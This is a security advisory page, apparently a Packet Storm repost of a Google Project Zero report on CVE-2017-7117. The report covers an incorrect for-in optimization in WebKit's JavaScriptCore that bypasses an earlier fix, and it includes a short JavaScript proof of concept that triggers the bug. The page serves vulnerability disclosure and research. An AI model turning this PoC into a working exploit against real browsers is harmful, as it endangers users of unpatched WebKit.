A proof of concept has been released that bypasses the fix for the original finding regarding an incorrect optimization in BytecodeGenerator::emitGetByVal in WebKit JSC.
424b380e7d3c1cbc0226f7a72afefbd2fcb4158f18e5251ba138a6ab2b914b5bWebKit: JSC: Incorrect for-in optimization #2
CVE-2017-7117
The following PoC bypasses the fix for the https://bugs.chromium.org/p/project-zero/issues/detail?id=1263 WebKit: JSC: Incorrect optimization in BytecodeGenerator::emitGetByVal
PoC:
function f() {
let o = {};
for (let i in {xx: 0}) {
for (i of [0]) {
}
print(o[i]);
}
}
f();
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed